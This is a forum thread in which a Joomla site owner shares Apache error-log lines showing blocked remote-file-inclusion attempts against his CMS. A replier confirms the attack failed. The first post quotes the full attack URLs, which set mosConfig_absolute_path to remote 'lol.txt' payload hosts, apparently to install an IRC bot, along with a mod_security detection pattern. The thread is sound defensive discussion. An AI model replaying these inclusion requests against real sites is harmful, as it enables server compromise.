Suspected bot installer/ddos attempt. Please help

software development

#1

I posted a request for support a day or two ago, but haven’t heard back. These log entries are from then, but this sort of thing has continued to show up in my error.log. Please read and offer any suggestions if someone would be so kind. I appreciate it very much. Excerpts from support email follow…


I noticed that the Docman component was down in my Joomla site, so I checked the error logs. I believe that these items are possibly unrelated, but I don’t know. Unknown individuals tried to use a Joomla exploit in order to compromise http://benconley.net/cms

My googling shows that this is an attempt to download and install an irc relay server on my machine. Evidently the exploit targets a component I am not using. My Joomla installation has Register Globals emulation turned off, so I believe that this was a failed attempt. I just wanted to make you aware of it. I was unable to find any processes running that I did not recognize when I ran “top” from ssh.

Here are the urls with the actual code to be executed by them in text format. Thanks for taking the time to read this. I am a happy customer and think you’re doing a great job. Please let me know if this is the right way for me to have proceeded here. Info from logs and my searches follows


http://mirckurdu.net/
http://asksevda.net/

http://mirckurdu.net/images/lol.txt
http://mirckurdu.net/images/v6.txt
http://asksevda.net/system/lol.txt
http://asksevda.net/system/v6.txt

FORUM THREAD REGARDING EXPLOIT
http://forum.joomla.org/index.php/topic,76654.0.html

[Thu Sep 21 14:03:15 2006] [error] [client 72.22.71.71] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at THE_REQUEST. [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://asksevda.net/system/lol.txt?”]
[Thu Sep 21 14:03:18 2006] [error] [client 216.55.160.103] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at THE_REQUEST. [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mirckurdu.net/images/lol.txt?”]
[Thu Sep 21 14:03:30 2006] [error] [client 202.41.167.246] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at THE_REQUEST. [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://65.254.61.51/~httpds/lol.txt?”]

BC Tech
Team Shocker


#2

I think you did all the right things to establish that the exploit attempt failed. This is yet another example of why keeping updated is important.

–rlparker


#3

Thanks a lot for the prompt response. You’ve helped to put me at ease.

BC Tech
Team Shocker